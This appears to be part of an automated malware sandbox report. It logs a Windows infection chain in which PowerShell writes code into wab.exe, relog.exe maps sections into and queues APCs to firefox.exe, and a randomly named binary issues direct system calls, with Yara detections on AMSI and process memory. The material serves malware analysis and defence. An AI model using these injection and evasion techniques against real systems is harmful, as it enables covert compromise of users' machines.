              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D005A7 mov eax, dword ptr fs:[00000030h]26_2_21D005A7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D005A7 mov eax, dword ptr fs:[00000030h]26_2_21D005A7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA45B1 mov eax, dword ptr fs:[00000030h]26_2_21CA45B1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA45B1 mov eax, dword ptr fs:[00000030h]26_2_21CA45B1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C88550 mov eax, dword ptr fs:[00000030h]26_2_21C88550
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C88550 mov eax, dword ptr fs:[00000030h]26_2_21C88550
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB656A mov eax, dword ptr fs:[00000030h]26_2_21CB656A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB656A mov eax, dword ptr fs:[00000030h]26_2_21CB656A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB656A mov eax, dword ptr fs:[00000030h]26_2_21CB656A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7B562 mov eax, dword ptr fs:[00000030h]26_2_21C7B562
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBB570 mov eax, dword ptr fs:[00000030h]26_2_21CBB570
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBB570 mov eax, dword ptr fs:[00000030h]26_2_21CBB570
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB7505 mov eax, dword ptr fs:[00000030h]26_2_21CB7505
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB7505 mov ecx, dword ptr fs:[00000030h]26_2_21CB7505
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]26_2_21D54500
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]26_2_21D54500
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]26_2_21D54500
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]26_2_21D54500
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]26_2_21D54500
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]26_2_21D54500
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]26_2_21D54500
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D55537 mov eax, dword ptr fs:[00000030h]26_2_21D55537
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]26_2_21D2F525
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]26_2_21D2F525
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]26_2_21D2F525
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]26_2_21D2F525
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]26_2_21D2F525
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]26_2_21D2F525
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]26_2_21D2F525
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBD530 mov eax, dword ptr fs:[00000030h]26_2_21CBD530
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBD530 mov eax, dword ptr fs:[00000030h]26_2_21CBD530
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D3B52F mov eax, dword ptr fs:[00000030h]26_2_21D3B52F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8D534 mov eax, dword ptr fs:[00000030h]26_2_21C8D534
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8D534 mov eax, dword ptr fs:[00000030h]26_2_21C8D534
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8D534 mov eax, dword ptr fs:[00000030h]26_2_21C8D534
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8D534 mov eax, dword ptr fs:[00000030h]26_2_21C8D534
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8D534 mov eax, dword ptr fs:[00000030h]26_2_21C8D534
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8D534 mov eax, dword ptr fs:[00000030h]26_2_21C8D534
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C90535 mov eax, dword ptr fs:[00000030h]26_2_21C90535
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C90535 mov eax, dword ptr fs:[00000030h]26_2_21C90535
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C90535 mov eax, dword ptr fs:[00000030h]26_2_21C90535
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C90535 mov eax, dword ptr fs:[00000030h]26_2_21C90535
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C90535 mov eax, dword ptr fs:[00000030h]26_2_21C90535
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C90535 mov eax, dword ptr fs:[00000030h]26_2_21C90535
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D554DB mov eax, dword ptr fs:[00000030h]26_2_21D554DB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C804E5 mov ecx, dword ptr fs:[00000030h]26_2_21C804E5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7B480 mov eax, dword ptr fs:[00000030h]26_2_21C7B480
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C89486 mov eax, dword ptr fs:[00000030h]26_2_21C89486
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C89486 mov eax, dword ptr fs:[00000030h]26_2_21C89486
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C864AB mov eax, dword ptr fs:[00000030h]26_2_21C864AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB34B0 mov eax, dword ptr fs:[00000030h]26_2_21CB34B0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB44B0 mov ecx, dword ptr fs:[00000030h]26_2_21CB44B0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D3F453 mov eax, dword ptr fs:[00000030h]26_2_21D3F453
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8B440 mov eax, dword ptr fs:[00000030h]26_2_21C8B440
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8B440 mov eax, dword ptr fs:[00000030h]26_2_21C8B440
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8B440 mov eax, dword ptr fs:[00000030h]26_2_21C8B440
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8B440 mov eax, dword ptr fs:[00000030h]26_2_21C8B440
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8B440 mov eax, dword ptr fs:[00000030h]26_2_21C8B440
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8B440 mov eax, dword ptr fs:[00000030h]26_2_21C8B440
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]26_2_21CBE443
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]26_2_21CBE443
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]26_2_21CBE443
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]26_2_21CBE443
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]26_2_21CBE443
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]26_2_21CBE443
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]26_2_21CBE443
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]26_2_21CBE443
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA245A mov eax, dword ptr fs:[00000030h]26_2_21CA245A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7645D mov eax, dword ptr fs:[00000030h]26_2_21C7645D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C81460 mov eax, dword ptr fs:[00000030h]26_2_21C81460
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C81460 mov eax, dword ptr fs:[00000030h]26_2_21C81460
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C81460 mov eax, dword ptr fs:[00000030h]26_2_21C81460
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C81460 mov eax, dword ptr fs:[00000030h]26_2_21C81460
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C81460 mov eax, dword ptr fs:[00000030h]26_2_21C81460
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9F460 mov eax, dword ptr fs:[00000030h]26_2_21C9F460
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9F460 mov eax, dword ptr fs:[00000030h]26_2_21C9F460
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9F460 mov eax, dword ptr fs:[00000030h]26_2_21C9F460
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9F460 mov eax, dword ptr fs:[00000030h]26_2_21C9F460
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9F460 mov eax, dword ptr fs:[00000030h]26_2_21C9F460
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9F460 mov eax, dword ptr fs:[00000030h]26_2_21C9F460
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D5547F mov eax, dword ptr fs:[00000030h]26_2_21D5547F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0C460 mov ecx, dword ptr fs:[00000030h]26_2_21D0C460
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAA470 mov eax, dword ptr fs:[00000030h]26_2_21CAA470
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAA470 mov eax, dword ptr fs:[00000030h]26_2_21CAA470
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAA470 mov eax, dword ptr fs:[00000030h]26_2_21CAA470
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D07410 mov eax, dword ptr fs:[00000030h]26_2_21D07410
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA340D mov eax, dword ptr fs:[00000030h]26_2_21CA340D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB8402 mov eax, dword ptr fs:[00000030h]26_2_21CB8402
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB8402 mov eax, dword ptr fs:[00000030h]26_2_21CB8402
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB8402 mov eax, dword ptr fs:[00000030h]26_2_21CB8402
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7C427 mov eax, dword ptr fs:[00000030h]26_2_21C7C427
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7E420 mov eax, dword ptr fs:[00000030h]26_2_21C7E420
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7E420 mov eax, dword ptr fs:[00000030h]26_2_21C7E420
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7E420 mov eax, dword ptr fs:[00000030h]26_2_21C7E420
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C857C0 mov eax, dword ptr fs:[00000030h]26_2_21C857C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C857C0 mov eax, dword ptr fs:[00000030h]26_2_21C857C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C857C0 mov eax, dword ptr fs:[00000030h]26_2_21C857C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D007C3 mov eax, dword ptr fs:[00000030h]26_2_21D007C3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C817EC mov eax, dword ptr fs:[00000030h]26_2_21C817EC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C817EC mov eax, dword ptr fs:[00000030h]26_2_21C817EC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C817EC mov eax, dword ptr fs:[00000030h]26_2_21C817EC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA27ED mov eax, dword ptr fs:[00000030h]26_2_21CA27ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA27ED mov eax, dword ptr fs:[00000030h]26_2_21CA27ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA27ED mov eax, dword ptr fs:[00000030h]26_2_21CA27ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0E7E1 mov eax, dword ptr fs:[00000030h]26_2_21D0E7E1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C847FB mov eax, dword ptr fs:[00000030h]26_2_21C847FB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C847FB mov eax, dword ptr fs:[00000030h]26_2_21C847FB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D3F78A mov eax, dword ptr fs:[00000030h]26_2_21D3F78A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D537B6 mov eax, dword ptr fs:[00000030h]26_2_21D537B6
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C807AF mov eax, dword ptr fs:[00000030h]26_2_21C807AF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D097A9 mov eax, dword ptr fs:[00000030h]26_2_21D097A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAD7B0 mov eax, dword ptr fs:[00000030h]26_2_21CAD7B0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]26_2_21C7F7BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]26_2_21C7F7BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]26_2_21C7F7BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]26_2_21C7F7BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]26_2_21C7F7BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]26_2_21C7F7BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h] | 26_2_21C7F7BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D0F7AF mov eax, dword ptr fs:[00000030h] | 26_2_21D0F7AF
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D04755 mov eax, dword ptr fs:[00000030h] | 26_2_21D04755
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CB674D mov esi, dword ptr fs:[00000030h] | 26_2_21CB674D
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CB674D mov eax, dword ptr fs:[00000030h] | 26_2_21CB674D
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C93740 mov eax, dword ptr fs:[00000030h] | 26_2_21C93740
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D0E75D mov eax, dword ptr fs:[00000030h] | 26_2_21D0E75D
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C80750 mov eax, dword ptr fs:[00000030h] | 26_2_21C80750
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D53749 mov eax, dword ptr fs:[00000030h] | 26_2_21D53749
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2750 mov eax, dword ptr fs:[00000030h] | 26_2_21CC2750
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C7B765 mov eax, dword ptr fs:[00000030h] | 26_2_21C7B765
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_23D7724E GetProcessHeap, | 10_2_23D7724E
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process token adjusted: Debug
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_23D72B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 10_2_23D72B1C
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_23D72639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 10_2_23D72639
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_23D760E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 10_2_23D760E2

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara match | File source: amsi64_7616.amsi.csv, type: OTHER
              Source: Yara match | File source: amsi32_5288.amsi.csv, type: OTHER
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7616, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7860, type: MEMORYSTR
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtClose: Direct from: 0x76F02B6C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtCreateKey: Direct from: 0x76F02C6C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtSetInformationThread: Direct from: 0x76F02B4C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtOpenSection: Direct from: 0x76F02E0C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtSetInformationThread: Direct from: 0x76EF63F9
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtCreateFile: Direct from: 0x76F02FEC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtOpenFile: Direct from: 0x76F02DCC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtTerminateThread: Direct from: 0x76EF7B2E
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtTerminateProcess: Direct from: 0x76F02D5C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtCreateMutant: Direct from: 0x76F035CC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtResumeThread: Direct from: 0x76F036AC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtReadFile: Direct from: 0x76F02ADC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtDelayExecution: Direct from: 0x76F02DDC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtResumeThread: Direct from: 0x76F02FBC
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | NtCreateUserProcess: Direct from: 0x76F0371C
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: NULL target: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe protection: execute and read and write
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: NULL target: C:\Windows\SysWOW64\relog.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: NULL target: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe protection: read write
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: NULL target: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\relog.exe | Thread register set: target process: 3408
              Source: C:\Windows\SysWOW64\relog.exe | Thread APC queued: target process: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3FA0000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 73FD94
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3280000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 327FF8C
